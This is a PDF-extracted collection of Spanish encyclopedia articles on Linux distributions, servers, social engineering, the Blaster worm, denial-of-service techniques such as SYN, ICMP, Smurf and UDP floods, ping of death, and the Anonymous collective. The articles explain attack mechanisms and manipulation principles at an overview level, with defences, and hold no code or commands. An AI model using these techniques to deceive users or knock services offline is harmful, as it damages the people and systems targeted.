Attachmate Group).• Puppy Linux, versión para equipos antiguos o con pocos recursos que pesa unos 130 MiB.• CentOS, una distribución creada a partir del mismo código del sistema Red Hat pero mantenida por una

comunidad de desarrolladores voluntarios.• Gentoo, una distribución orientada a usuarios avanzados, conocida por la similitud en su sistema de paquetes con

el FreeBSD Ports, un sistema que automatiza la compilación de aplicaciones desde su código fuente.• Knoppix, fue la primera distribución live en correr completamente desde un medio extraíble. Está basada en

Debian.• Mandriva, mantenida por la compañía francesa del mismo nombre, es un sistema popular en Francia y Brasil. Está

basada en Red Hat.• PCLinuxOS, derivada de Mandriva, pasó de ser un pequeño proyecto a una popular distribución con una gran

comunidad de desarrolladores.

Page 14: Virus informático

Distribución Linux 12

• Red Hat Enterprise Linux, derivada de Fedora, es mantenida y soportada comercialmente por Red Hat.• Slackware, una de las primeras distribuciones Linux y la más antigua en funcionamiento. Fue fundada en 1993 y

desde entonces ha sido mantenida activamente por Patrick J. Volkerding.• Slax, es un sistema Linux pequeño, moderno, rápido y portable orientado a la modularidad. Está basado en

Slackware.• Dragora y Trisquel, que van adquiriendo importancia entre las distribuciones que sólo contienen software libre.• Canaima, es un proyecto socio-tecnológico abierto, construido de forma colaborativa, desarrollado en Venezuela

y basado en Debian.• Tuquito Basada en Ubuntu, distribución desarrollada en argentina con buenas interfaces gráficas y drivers

universales. Recomendada para usuarios iniciales.El sitio web DistroWatch ofrece una lista de las distribuciones más populares; la lista está basada principalmente enel número de visitas, por lo que no ofrece resultados muy confiables acerca de la popularidad de las distribuciones.

Distribuciones especializadasOtras distribuciones se especializan en grupos específicos:• ICABIAN, en formato Live USB está pensada para usuarios técnicos ya que contiene una gran variedad de

programas para la ciencia e ingeniería.• OpenWrt, diseñada para ser empotrada en dispositivos enrutadores.• Edubuntu, un sistema del proyecto Ubuntu diseñado para entornos educativos.• Emmabuntüs, es diseñada para facilitar el reacondicionamiento de computadores donados a comunidades Emaús.• LULA, distribución académica para universidades. Proyecto LULA.• MythTV, orientada para equipos multimedia o grabadores de vídeo digital.• Musix, una distribución de Argentina destinada a los músicos.• mkLinux, Yellow Dog Linux o Black Lab Linux, orientadas a usuarios de Macintosh y de la plataforma

PowerPC.• 64 Studio, una distribución basada en Debian diseñada para la edición multimedia.• ABC GNU/Linux, distribución para la construcción de clusters Beowulf desarrollado por Iker Castaños Chavarri,

Universidad del País Vasco.

Galería

Debian GNU/Linux 6.0.2.1«Squeeze»

Fedora 16 «Verne» Gentoo Linux 10.0 Mandriva Linux 2010.0«Adelie»

openSUSE 12.1 Slackware 13 Ubuntu 11.10 «Oneiric Ocelot»

Page 15: Virus informático

Distribución Linux 13

Sabayon Linux 7.0 Puppy Linux 4.3 SLAX 6.0.7

PCLinuxOS 2009.2 Canaima 2.0 Joventux 3.0 Dax OS 2.0

Referencias[1] http:/ / futurist. se/ gldt/[2] Patrick J. Volkerding. Slackware 1.0 Release Announcement (http:/ / www. slackware. com/ announce/ 1. 0. php) Slackware Linux, Inc. (en

inglés)

Enlaces externos• Wikimedia Commons alberga contenido multimedia sobre Distribución Linux. Commons• www.distrowatch.com (http:/ / www. distrowatch. com/ index. php?language=ES), catálogo informativo de

distribuciones.• Cronología de la historia de las distribuciones Linux (http:/ / www. tufuncion. com/ historia-distribuciones-linux)

Page 16: Virus informático

Servidor 14

ServidorEn informática, un servidor es un nodo que forma parte de una red, provee servicios a otros nodos denominadosclientes.También se suele denominar con la palabra servidor a:• Una aplicación informática o programa que realiza algunas tareas en beneficio de otras aplicaciones llamadas

clientes. Algunos servicios habituales son los servicios de archivos, que permiten a los usuarios almacenar yacceder a los archivos de una computadora y los servicios de aplicaciones, que realizan tareas en beneficio directodel usuario final. Este es el significado original del término. Es posible que un ordenador cumpla simultáneamentelas funciones de cliente y de servidor.

• Una computadora en la que se ejecuta un programa que realiza alguna tarea en beneficio de otras aplicacionesllamadas clientes, tanto si se trata de un ordenador central (mainframe), un miniordenador, una computadorapersonal, una PDA o un sistema embebido; sin embargo, hay computadoras destinadas únicamente a proveer losservicios de estos programas: estos son los servidores por antonomasia.

Ejemplo de un servidor del tipo rack.

• Un servidor no es necesariamente una máquina de últimageneración de grandes proporciones, no es necesariamente unsuperordenador; un servidor puede ser desde una computadoravieja, hasta una máquina sumamente potente (ej.: servidores web,bases de datos grandes, etc. Procesadores especiales y hasta variosterabytes de memoria). Todo esto depende del uso que se le dé alservidor. Si usted lo desea, puede convertir al equipo desde el cualusted está leyendo esto en un servidor instalando un programa quetrabaje por la red y a la que los usuarios de su red ingresen a travésde un programa de servidor web como Apache.

Por lo cual podemos llegar a la conclusión de que un servidor también puede ser un proceso que entrega informacióno sirve a otro proceso. El modelo Cliente-servidor no necesariamente implica tener dos ordenadores, ya que unproceso cliente puede solicitar algo como una impresión a un proceso servidor en un mismo ordenador.

Tipos de servidoresEn la siguiente lista hay algunos tipos comunes de servidores: es el que almacena varios tipos de archivos y losdistribuye a otros clientes en la red.

• Servidor de impresiones: controla una o más impresoras y acepta trabajos de impresión de otros clientes de lared, poniendo en cola los trabajos de impresión (aunque también puede cambiar la prioridad de las diferentesimpresiones), y realizando la mayoría o todas las otras funciones que en un sitio de trabajo se realizaría paralograr una tarea de impresión si la impresora fuera conectada directamente con el puerto de impresora del sitio detrabajo.

• Servidor de correo: almacena, envía, recibe, enruta y realiza otras operaciones relacionadas con el correoelectrónico para los clientes de la red.

• Servidor de fax: almacena, envía, recibe, enruta y realiza otras funciones necesarias para la transmisión, larecepción y la distribución apropiadas de los fax.

• Servidor de la telefonía: realiza funciones relacionadas con la telefonía, como es la de contestador automático,realizando las funciones de un sistema interactivo para la respuesta de la voz, almacenando los mensajes de voz,encaminando las llamadas y controlando también la red o el Internet, p. ej., la entrada excesiva de la voz sobre IP(VoIP), etc.

Page 17: Virus informático

Servidor 15

• Servidor proxy: realiza un cierto tipo de funciones a nombre de otros clientes en la red para aumentar elfuncionamiento de ciertas operaciones (p. ej., prefetching y depositar documentos u otros datos que se solicitenmuy frecuentemente), también proporciona servicios de seguridad, o sea, incluye un cortafuegos. Permiteadministrar el acceso a internet en una red de computadoras permitiendo o negando el acceso a diferentes sitiosWeb.

• Servidor del acceso remoto (RAS): controla las líneas de módem de los monitores u otros canales decomunicación de la red para que las peticiones conecten con la red de una posición remota, responde llamadastelefónicas entrantes o reconoce la petición de la red y realiza la autentificación necesaria y otros procedimientosnecesarios para registrar a un usuario en la red.

• Servidor de uso: realiza la parte lógica de la informática o del negocio de un uso del cliente, aceptando lasinstrucciones para que se realicen las operaciones de un sitio de trabajo y sirviendo los resultados a su vez al sitiode trabajo, mientras que el sitio de trabajo realiza la interfaz operadora o la porción del GUI del proceso (es decir,la lógica de la presentación) que se requiere para trabajar correctamente.

• Servidor web: almacena documentos HTML, imágenes, archivos de texto, escrituras, y demás material Webcompuesto por datos (conocidos colectivamente como contenido), y distribuye este contenido a clientes que lapiden en la red.

• Servidor de base de datos: provee servicios de base de datos a otros programas u otras computadoras, como esdefinido por el modelo cliente-servidor. También puede hacer referencia a aquellas computadoras (servidores)dedicadas a ejecutar esos programas, prestando el servicio.

• Servidor de reserva: tiene el software de reserva de la red instalado y tiene cantidades grandes dealmacenamiento de la red en discos duros u otras formas del almacenamiento (cinta, etc.) disponibles para que seutilice con el fin de asegurarse de que la pérdida de un servidor principal no afecte a la red. Esta técnica tambiénes denominada clustering.

• Servidor de Seguridad: Tiene software especializado para detener intrusiones maliciosas, normalmente tienenantivirus, antispyware, antimalware, además de contar con cortafuegos redundantes de diversos niveles y/o capaspara evitar ataques, los servidores de seguridad varían dependiendo de su utilización e importancia.

Sin embargo, de acuerdo al rol que asumen dentro de una red se dividen en:• Servidor dedicado: son aquellos que le dedican toda su potencia a administrar los recursos de la red, es decir, a

atender las solicitudes de procesamiento de los clientes.• Servidor no dedicado: son aquellos que no dedican toda su potencia a los clientes, sino también pueden jugar el

rol de estaciones de trabajo al procesar solicitudes de un usuario local.

Referencias

Page 18: Virus informático

Ingeniería social (seguridad informática) 16

Ingeniería social (seguridad informática)Para ver un término similar en una disciplina diferente vea Ingeniería social (ciencias políticas).

En el campo de la seguridad informática, ingeniería social es la práctica de obtener información confidencial através de la manipulación de usuarios legítimos. Es una técnica que pueden usar ciertas personas, tales comoinvestigadores privados, criminales, o delincuentes informáticos, para obtener información, acceso o privilegios ensistemas de información que les permitan realizar algún acto que perjudique o exponga la persona u organismocomprometido a riesgo o abusos.El principio que sustenta la ingeniería social es el que en cualquier sistema "los usuarios son el eslabón débil". En lapráctica, un ingeniero social usará comúnmente el teléfono o Internet para engañar a la gente, fingiendo ser, porejemplo, un empleado de algún banco o alguna otra empresa, un compañero de trabajo, un técnico o un cliente. VíaInternet o la web se usa, adicionalmente, el envío de solicitudes de renovación de permisos de acceso a páginas webo memos falsos que solicitan respuestas e incluso las famosas cadenas, llevando así a revelar información sensible, oa violar las políticas de seguridad típicas. Con este método, los ingenieros sociales aprovechan la tendencia naturalde la gente a reaccionar de manera predecible en ciertas situaciones, -por ejemplo proporcionando detallesfinancieros a un aparente funcionario de un banco- en lugar de tener que encontrar agujeros de seguridad en lossistemas informáticos.Quizá el ataque más simple pero muy efectivo sea engañar a un usuario llevándolo a pensar que un administrador delsistema esta solicitando una contraseña para varios propósitos legítimos. Los usuarios de sistemas de Internetfrecuentemente reciben mensajes que solicitan contraseñas o información de tarjeta de crédito, con el motivo de"crear una cuenta", "reactivar una configuración", u otra operación benigna; a este tipo de ataques se los llamaphishing (se pronuncia igual que "fishing", pesca). Los usuarios de estos sistemas deberían ser advertidos temprana yfrecuentemente para que no divulguen contraseñas u otra información sensible a personas que dicen seradministradores. En realidad, los administradores de sistemas informáticos raramente (o nunca) necesitan saber lacontraseña de los usuarios para llevar a cabo sus tareas. Sin embargo incluso este tipo de ataque podría no sernecesario — en una encuesta realizada por la empresa Boixnet, el 90% de los empleados de oficina de la estaciónWaterloo de Londres reveló sus contraseñas a cambio de un bolígrafo barato.Otro ejemplo contemporáneo de un ataque de ingeniería social es el uso de archivos adjuntos en e-mails, ofreciendo,por ejemplo, fotos "íntimas" de alguna persona famosa o algún programa "gratis" (a menudo aparentementeprovenientes de alguna persona conocida) pero que ejecutan código malicioso (por ejemplo, usar la máquina de lavíctima para enviar cantidades masivas de spam). Ahora, después de que los primeros e-mails maliciosos llevaran alos proveedores de software a deshabilitar la ejecución automática de archivos adjuntos, los usuarios deben activaresos archivos de forma explícita para que ocurra una acción maliciosa. Muchos usuarios, sin embargo, abren casiciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque.La ingeniería social también se aplica al acto de manipulación cara a cara para obtener acceso a los sistemasinformáticos. Otro ejemplo es el conocimiento sobre la víctima, a través de la introducción de contraseñas habituales,lógicas típicas o conociendo su pasado y presente; respondiendo a la pregunta: ¿Qué contraseña introduciría yo sifuese la víctima?La principal defensa contra la ingeniería social es educar y entrenar a los usuarios en el uso de políticas de seguridady asegurarse de que estas sean seguidas.Uno de los ingenieros sociales más famosos de los últimos tiempos es Kevin Mitnick. Según su opinión, laingeniería social se basa en estos cuatro principios:1. Todos queremos ayudar.2. El primer movimiento es siempre de confianza hacia el otro.3. No nos gusta decir No.

Page 19: Virus informático

Ingeniería social (seguridad informática) 17

4. A todos nos gusta que nos alaben.

Referencias• John Leyden, 18 de abril de 2003. Office workers give away passwords for a cheap pen [1] (Oficinistas revelan

contraseñas) (en inglés). The Register [2].• Kevin D. Mitnick, William L. Simon, Steve Wozniak. The Art of Deception: Controlling the Human Element of

Security. John Wiley & Sons, 2002. ISBN 0-471-23712-4.• SirRoss, 19 de enero de 2005. A Guide to Social Engineering, Volume 1 [3] A Guide to Social Engineering,

Volume 2 [4]. AstaLavista.

Enlaces externos• Social Engineering Fundamentals [5]

• Información sobre ingeniería social y fraude de la Oficina de Seguridad del Internauta [6]

• Informe sobre como recopilar información de seguridad [7]

• Human Security - Blog de Ingeniería Social en castellano [8]

Referencias[1] http:/ / www. theregister. co. uk/ 2003/ 04/ 18/ office_workers_give_away_passwords/[2] http:/ / www. theregister. co. uk/[3] http:/ / www. astalavista. com/ index. php?section=directory& linkid=3410[4] http:/ / www. astalavista. com/ index. php?section=directory& linkid=3488[5] http:/ / www. securityfocus. com/ infocus/ 1527[6] http:/ / www. osi. es/ es/ conoce-los-riesgos/ fraude-ingenieria-social[7] http:/ / cert. inteco. es/ cert/ Notas_Actualidad/

intecocert_csirtcv_generalitat_valenciana_publican_informe_pentest_recoleccion_informacion_information_gathering_20111111[8] http:/ / humansec. wordpress. com

Page 20: Virus informático

Blaster 18

BlasterBlaster, (o también llamado Lovsan o LoveSan 3a1) es un gusano de red de Windows que se aprovecha de unavulnerabilidad en el servicio DCOM para infectar a otros sistemas de forma automática.El gusano fue detectado y liberado el día 11 de agosto de 2003. La tasa de infecciones aumentó considerablementehasta el día 13 de agosto de 2003. Gracias al filtrado por las ISP's y la gran publicidad frente este gusano, lainfección pudo frenarse.El 29 de agosto de 2003, Jeffrey Lee Parson, de 18 años de Hopkins, Minnesota fue arrestado por crear la variante Bdel gusano Blaster; admitió ser el responsable y fue sentenciado a 18 meses en prisión en enero de 2005.

Efectos principalesEl método con el que infecta los sistemas vulnerables es bastante parecido a la que usó el gusano Sasser, aparte, dejauna puerta trasera que permite la intrusión a terceros, haciendo que la máquina infectada sea fácilmente atacada porotros virus, o accesos remotos no autorizados.El gusano se disemina al explotar un desbordamiento de buffer en el servicio DCOM para los sistemas operativosWindows afectados, para los cuales se liberó un parche un mes antes en MS03-026 [1] y luego en MS03-039 [2].Está programado para realizar un ataque organizado de denegación de servicio al puerto 80 de"windowsupdate.com". sin embargo, los daños fueron mínimos debido a que el sitio era redirigido a"windowsupdate.microsoft.com". Aparte, Microsoft apagó sus servidores para minimizar los efectos.El gusano tiene en su código los siguientes mensajes:

I just want to say LOVE YOU SAN!!)

es por eso que a veces es llamado el gusano LoveSan o LovSan. El segundo:billy gates why do you make this possible ? Stop making money and fix your software!!(Billy Gates, ¿Porqué haces esto posible? ¡¡Deja de hacer dinero y corrige tu software!!)

Es un mensaje a Bill Gates, el fundador de Microsoft, y el objetivo del gusano.

Efectos secundariosEn algunas versiones de Windows, puede generar inestabilidad del sistema, e incluso una ventana que advierte alusuario de que se debe reiniciar el ordenador:

Apagando el sistema: Se está apagando el sistema. Guarde todo trabajo en progreso y cierre la sesión.Cualquier cambio sin guardar se perderá. El apagado fue ordenado por NT AUTHORITY\SYSTEMtiempo Restante: hh:mm:ssMensaje:Windows debe reiniciar ahora porque Remote Procedure Call (RPC) Service Terminó inesperadamente.

Page 21: Virus informático

Blaster 19

Referencias• Detalles del virus Blaster en INTECO-CERT. [3]• MS03-026 [1] Parche que cerraba el agujero de seguridad que aprovecha Blaster.• MS03-039 [2] Otro parche, publicado luego del ataque de Blaster.

Referencias[1] http:/ / www. microsoft. com/ technet/ security/ bulletin/ MS03-026. mspx[2] http:/ / www. microsoft. com/ technet/ security/ bulletin/ MS03-039. mspx[3] http:/ / cert. inteco. es/ virusDetail/ Actualidad/ Actualidad_Virus/ Detalle_Virus/ Blaster

Ataque de denegación de servicio

Diagrama de un ataque DDoS usando el softwareStacheldraht

En seguridad informática, un Ataque de denegación de servicios,también llamado ataque DoS (de las siglas en inglés Denial ofService), es un ataque a un sistema de computadoras o red quecausa que un servicio o recurso sea inaccesible a los usuarioslegítimos. Normalmente provoca la pérdida de la conectividad dela red por el consumo del ancho de banda de la red de la víctima osobrecarga de los recursos computacionales del sistema de lavíctima. Un ejemplo notable de este tipo de ataque se produjo el27 de marzo de 2013, cuando un ataque de una empresa a otrainundó la red de spam provocando una ralentización generalizadade Internet e incluso llegó a afectar a puntos clave como el nodocentral de Londres.[1]

Se genera mediante la saturación de los puertos con flujo deinformación, haciendo que el servidor se sobrecargue y no puedaseguir prestando servicios; por eso se le denomina "denegación",pues hace que el servidor no dé abasto a la cantidad de solicitudes.Esta técnica es usada por los llamados crackers para dejar fuera deservicio a servidores objetivo.

Una ampliación del ataque DoS es el llamado ataque distribuidode denegación de servicio, también llamado ataque DDoS (de lassiglas en inglés Distributed Denial of Service) el cual se lleva a cabo generando un gran flujo de información desdevarios puntos de conexión. La forma más común de realizar un DDoS es a través de una botnet, siendo esta técnica elciberataque más usual y eficaz por su sencillez tecnológica.

En ocasiones, esta herramienta ha sido utilizada como un buen método para comprobar la capacidad de tráfico queun ordenador puede soportar sin volverse inestable y afectar a los servicios que presta. Un administrador de redespuede así conocer la capacidad real de cada máquina.

Page 22: Virus informático

Ataque de denegación de servicio 20

Métodos de ataqueUn ataque de "Denegación de servicio" impide el uso legítimo de los usuarios al usar un servicio de red. El ataque sepuede dar de muchas formas. Pero todas tienen algo en común: utilizan la familia de protocolos TCP/IP paraconseguir su propósito.Un ataque DoS puede ser perpetrado de varias formas. Aunque básicamente consisten en :•• Consumo de recursos computacionales, tales como ancho de banda, espacio de disco, o tiempo de procesador.•• Alteración de información de configuración, tales como información de rutas de encaminamiento.•• Alteración de información de estado, tales como interrupción de sesiones TCP (TCP reset).•• Interrupción de componentes físicos de red.•• Obstrucción de medios de comunicación entre usuarios de un servicio y la víctima, de manera que ya no puedan

comunicarse adecuadamente.

Inundación SYN (SYN Flood)Principios de TCP/IP

Cuando una máquina se comunica mediante TCP/IP con otra, envía una serie de datos junto a la petición real. Estosdatos forman la cabecera de la solicitud. Dentro de la cabecera se encuentran unas señalizaciones llamadas Flags(banderas). Estas señalizaciones (banderas) permiten iniciar una conexión, cerrarla, indicar que una solicitud esurgente, reiniciar una conexión, etc. Las banderas se incluyen tanto en la solicitud (cliente), como en la respuesta(servidor).Para aclararlo, veamos cómo es un intercambio estándar TCP/IP:•• 1 Establecer Conexión: El cliente envía una Flag SYN; si el servidor acepta la conexión, éste debería responderle

con un SYN/ACK; luego el cliente debería responder con una Flag ACK.

1-Cliente --------SYN-----> 2 Servidor

4-Cliente <-----SYN/ACK---- 3 Servidor

5-Cliente --------ACK-----> 6 Servidor

•• 2 Resetear Conexión: Al haber algún error o perdida de paquetes de envío se establece envío de Flags RST:

1-Cliente -------Reset-----> 2-servidor

4-Cliente <----Reset/ACK---- 3-Servidor

5-Cliente --------ACK------> 6-Servidor

La inundación SYN envía un flujo de paquetes TCP/SYN (varias peticiones con Flags SYN en la cabecera), muchasveces con la dirección de origen falsificada. Cada uno de los paquetes recibidos es tratado por el destino como unapetición de conexión, causando que el servidor intente establecer una conexión al responder con un paqueteTCP/SYN-ACK y esperando el paquete de respuesta TCP/ACK (Parte del proceso de establecimiento de conexiónTCP de 3 vías). Sin embargo, debido a que la dirección de origen es falsa o la dirección IP real no ha solicitado laconexión, nunca llega la respuesta.Estos intentos de conexión consumen recursos en el servidor y copan el número de conexiones que se puedenestablecer, reduciendo la disponibilidad del servidor para responder peticiones legítimas de conexión.SYN cookies provee un mecanismo de protección contra Inundación SYN, eliminando la reserva de recursos en elhost destino, para una conexión en momento de su gestión inicial.

Page 23: Virus informático

Ataque de denegación de servicio 21

Inundación ICMP (ICMP Flood)Es una técnica DoS que pretende agotar el ancho de banda de la víctima. Consiste en enviar de forma continuada unnúmero elevado de paquetes ICMP Echo request (ping) de tamaño considerable a la víctima, de forma que esta ha deresponder con paquetes ICMP Echo reply (pong) lo que supone una sobrecarga tanto en la red como en el sistema dela víctima.Dependiendo de la relación entre capacidad de procesamiento de la víctima y el atacante, el grado de sobrecargavaría, es decir, si un atacante tiene una capacidad mucho mayor, la víctima no puede manejar el tráfico generado.

SMURFExiste una variante a ICMP Flood denominado Ataque Smurf que amplifica considerablemente los efectos de unataque ICMP.Existen tres partes en un Ataque Smurf: El atacante, el intermediario y la víctima (comprobaremos que elintermediario también puede ser víctima).En el ataque Smurf, el atacante dirige paquetes ICMP tipo "echo request" (ping) a una dirección IP de broadcast,usando como dirección IP origen, la dirección de la víctima (Spoofing). Se espera que los equipos conectadosrespondan a la petición, usando Echo reply, a la máquina origen (víctima).Se dice que el efecto es amplificado, debido a que la cantidad de respuestas obtenidas, corresponde a la cantidad deequipos en la red que puedan responder. Todas estas respuestas son dirigidas a la víctima intentando colapsar susrecursos de red.Como se dijo anteriormente, los intermediarios también sufren los mismos problemas que las propias víctimas.

Inundación UDP (UDP Flood)Básicamente este ataque consiste en generar grandes cantidades de paquetes UDP contra la víctima elegida. Debido ala naturaleza sin conexión del protocolo UDP, este tipo de ataques suele venir acompañado de IP spoofing.Es usual dirigir este ataque contra máquinas que ejecutan el servicio Echo, de forma que se generan mensajes Echode un elevado tamaño.

Referencias[1] Una disputa entre empresas ralentiza Internet (http:/ / tecnologia. elpais. com/ tecnologia/ 2013/ 03/ 27/ actualidad/ 1364405367_942632.

html) por Rosa Jiménez Cano y publicado en El País el 27 de marzo de 2013. Comprobado el 27 de marzo de 2013.

Enlaces externos• Syn Flood, que es y como mitigarlo (http:/ / foro. hackhispano. com/ showthread. php?t=36604)• Intentando detener un DDoS (http:/ / foro. elhacker. net/ tutoriales_documentacion/

intentando_detener_un_ddos-t137442. 0. html)

Page 24: Virus informático

Ping de la muerte 22

Ping de la muerteUn ping de la muerte es un tipo de ataque enviado a una computadora que consiste en mandar numerosos paquetesICMP muy grandes (mayores a 65.535 bytes) con el fin de colapsar el sistema atacado.Los atacantes comenzaron a aprovecharse de esta vulnerabilidad en los sistemas operativos en 1996, vulnerabilidadque en 1997 sería corregida por lo que este tipo de ataque no tiene efecto sobre los sistemas operativos actuales.Es un tipo de ataque a computadoras que implica enviar un ping deformado a una computadora. Un pingnormalmente tiene un tamaño de 64 bytes; algunos sistemas operativos no podían manejar pings mayores al máximode un paquete IP común, que es de 65.535 bytes. Enviando pings de este tamaño era posible hacer que esascomputadoras dejaran de funcionar.Este fallo fue fácil de usar. Si bien, enviar un paquete de "Ping de la Muerte" de un tamaño de 65.536 bytes esinválido según los protocolos de establecimiento de una red, se puede enviar un paquete de tal tamaño si se hacenfragmentos del mismo. Así, cuando la computadora que es el blanco de ataque vuelve a montar el paquete, puedeocurrir una saturación del buffer, lo que a menudo produce como consecuencia un fallo del sistema.Este exploit ha afectado a la mayoría de Sistemas Operativos, como Unix, Linux, Mac, Windows, a impresoras, y alos routers. No obstante la mayoría de los sistemas operativos desde 1997-1998 han arreglado este problema, por loque el fallo está solucionado.En la actualidad otro tipo de ataques con ping han llegado a ser muy utilizados, como por ejemplo el "PingFlooding".

Enlaces externos• Ping of death según insecure.org [1]

Referencias[1] http:/ / www. insecure. org/ sploits/ ping-o-death. html

Page 25: Virus informático

Anonymous 23

Anonymous

Anonymous

Una de las banderas del movimiento. El hombre sin cabeza y traje formal representa la ausencia de líderes o dirigentes.Lema We are Anonymous.

We are Legion.We do not forgive.We do not forget.Expect us![][]

Tipo Fenómeno de InternetComunidad virtualAsociación voluntaria

Objetivos CiberactivismoControversia en InternetEntretenimiento

Fundación 2003 - 2004

Ámbito Global

Miembros DescentralizadosGrupo de afinidad

Sitio web Red Social: http:/ / anonplus. com/ [1]

Algunas operaciones importantes pueden verse en:http:/ / anonops. blogspot. com/ [2]

Anonymous [əˈnɒnɪməs] (Anónimo o Anónimos en castellano) es un seudónimo utilizado mundialmente pordiferentes grupos e individuos para —poniéndose o no de acuerdo con otros— realizar en su nombre acciones opublicaciones individuales o concertadas. Surgidos del imageboard 4chan, en un comienzo como un movimiento pordiversión, desde el 2008 Anonymous se manifiesta en acciones de protesta a favor de la libertad de expresión, de laindependencia de Internet y en contra de diversas organizaciones, entre ellas, Scientology, servicios públicos,consorcios con presencia global y sociedades de derechos de autor. En sus inicios, los participantes actuabansolamente en Internet, pero entretanto desarrollan sus actividades también fuera de la red. Entre otros medios deacción de Anonymous, se cuentan las manifestaciones en las calles y los ataques de hackers.Puesto que no existe una jerarquía —al menos ninguna evidente o reconocible— resulta en general difícil confirmarla autenticidad de las noticias o informaciones referentes a Anonymous. Asimismo, debido al anonimato, sucede queun único individuo puede producir noticias falsas e introducirlas como supuestamente auténticas de Anonymous.En el sentido lato, Anonymous se considera como un término para ciertas subculturas de Internet. No son patriotaspor lo que su bandera representa algo neutral. [3][]

Page 26: Virus informático

Anonymous 24

Formas de acción y coordinaciónLas acciones atribuidas a Anonymous son llevadas a cabo por individuos no identificados que se autodenominanAnonymous.[] Después de una serie de polémicas, protestas y ataques DDoS en 2008, los incidentes vinculados a susmiembros son cada vez más comunes.[]

Anonymous se organiza de manera difusa en la red, lo que dificulta encontrar algo oficial relacionado conAnonymous. Sin embargo, esta comunidad de personas organiza operaciones, debate del estado de los países ydemás asuntos valéndose de distintos canales online.Aunque no están vinculados a una única entidad online, muchas webs estuvieron en sus inicios fuertemente ligadas aAnonymous. Esto incluye notables tablones de imágenes como 4chan y Futaba Channel, algunas wikis asociadas aestos tablones como Encyclopædia Dramatica y una serie de foros de diversas temáticas.[4] Más tarde seimplementaron Wikis diversas y Chats (canales IRC) con el objetivo de ganar mayor presencia en el espacioInternet. A través de estas plataformas se han organizado protestas como el Project Chanology.[5][6]

Las redes sociales, como Facebook y similares, desempeñan un papel más bien secundario en la estructura, perosuelen utulizarse para la formación de pequeños grupos o «células» y su coordinación para la movilización a la calleen las protestas reales.[7]

Anonymous no tiene líderes, ni tampoco instancias controladoras. Se basa en la fuerza colectiva de sus participantesindividuales y en la ventaja de que la información puede ser difundida rápidamente a través de internet.[8]

Aunque algunos sitios web como eBaum's World estipulan que solamente los adultos mayores de 18 años deberíanver los contenidos, no hay ninguna posibilidad segura de bloquear el acceso a los más jóvenes, por lo que algunos«anona» son menores de edad.Debido a que no existe una dirección, ni tampoco membresía en sentido administrativo y la colaboración escompletamente sin compromiso, su estructura puede compararse a la de un movimiento juvenil anarquista.[9] Así, almenos de acuerdo a lo que se conoce hasta ahora, no cuenta con una estructura orgánica central o una jerarquía quesea de algún modo vinculante para todos los miembros del colectivo. Es decir, en el caso de Anonymous no se tratade una organización en el sentido común del término, sino más bien de un colectivo o un movimiento.

Orígenes como concepto y fenómeno de Internet

Miembros de Anonymous con máscaras de Guy Fawkes, utilizadapor el personaje V (Vi, Ve o Uve, dependiendo el país) de la novela

gráfica y película V de Vendetta, de Alan Moore, en Los Ángeles, 10de febrero de 2008.

El nombre de Anonymous en sí mismo está inspirado enel anonimato que perciben los usuarios cuandopublican comentarios e imágenes en Internet. El uso deltérmino, en el sentido de una identidad compartida,empezó en los tablones de imágenes (en inglés:imageboards) donde se le asigna la etiqueta de"anónimo" a los visitantes que dejan comentarios sinidentificarse. Algunas veces los usuarios de lostablones de imágenes bromean actuando como siAnonymous fuera una persona real incluso aludiendo aella como "Anon".[10]

A la vez que la popularidad de los tablones deimágenes aumentaba, la idea de Anonymous como uncolectivo de individuos sin nombre se convirtió en un meme o fenómeno de Internet.[]

Las definiciones de Anonymous tienden a enfatizar el hecho de que el término no puede ser fácilmente comprendidopor una descripción simple, y en su lugar se explica a menudo por aforismos que describen cualidades percibidas.

Page 27: Virus informático

Anonymous 25

«Anonymous es la primera super-conciencia basada en Internet. Anonymous es un grupo, en el sentido de queuna bandada de aves es un grupo. ¿Por qué sabes que son un grupo? Porque viajan en la misma dirección. Enun momento dado, más aves podrían unirse, irse o cambiar completamente de rumbo».

Landers, Chris, Baltimore City Paper, 2 de abril de 2008[11]

El lemaEl lema de Anonymous es:

Knowledge is free.We areAnonymous.We are Legion.We do not forgive.We do not forget.Expect us!

El conocimiento eslibre.Somos Anónimos.Somos Legión.No perdonamos.No olvidamos.¡Esperadnos!

"Message to Scientology"[]

"Call to Action"[]

Bloqueo en redes socialesEl 9 de diciembre de 2010 Twitter canceló la cuenta de Anonymous y después Facebook eliminó la página deOperation Payback (Operación venganza) en lo que ya se considera por parte de miembros de Anonymous como unaguerra digital para proteger la libertad de información.[12]

En abril de 2011 el portal de vídeos YouTube comenzó a borrar vídeos subidos por cuentas de Anonymous.[13][14]

Detenciones

Arrestos en EspañaEl 10 de junio de 2011 el Cuerpo Nacional de Policía en España detuvo y posteriormente liberó a tres personasacusadas de asociación ilícita y de vulnerar el artículo 264.2 del Código Penal[15][16] por ser supuestamente losadministradores de chats desde los que se realizaron ataques a páginas web.La Policía Nacional y numerosos medios de comunicación anunciaron haber desmantelado la 'cúpula' deAnonymous, equiparando el término a los de organizaciones terroristas a pesar de tratarse de una organizacióndescentralizada y no jerárquica.[17][18]

En protesta y respuesta a estas detenciones y acusaciones, la página web de la Policía Nacional española [19] recibióun ataque DDoS a las 23:30 horas del sábado 11 de junio de 2011.[][20] La operación transcurrió bajo el hashtag enTwitter #OpPolicia.[]

Agentes de la policía Española detendrían a 4 miembros de anonymous, presuntos responsables de ataques DDoS.Los investigadores los identificaron y los detuvieron por diferentes puntos de España; primero en:Malága, Surespañola con el seudónimo "Thunder" o "pacotron"(F.J.B.D, iniciales de su nombre) presuntamente la cabezerainformática utilizada en Anonymous España e iberoaméricanas. Más tarde a "Troy"(J.M.L.G) en Madrid, presuntoautor de material de ataques más destacados y filtraciones reivindicadas por anonymous España. Se suma además elarresto de "J.I.P.S" colega en actividades de "Troy", y la aprisión de un joven de 16 años, presunto integrante de ungrupo internacional de hacking conocido como sector 404 relacionado con ataques de Anonymous; estos miembrosmencionados anteriormente disponían de un chat privado preciso de un certificado propio del administrador.[21]

Page 28: Virus informático

Anonymous 26

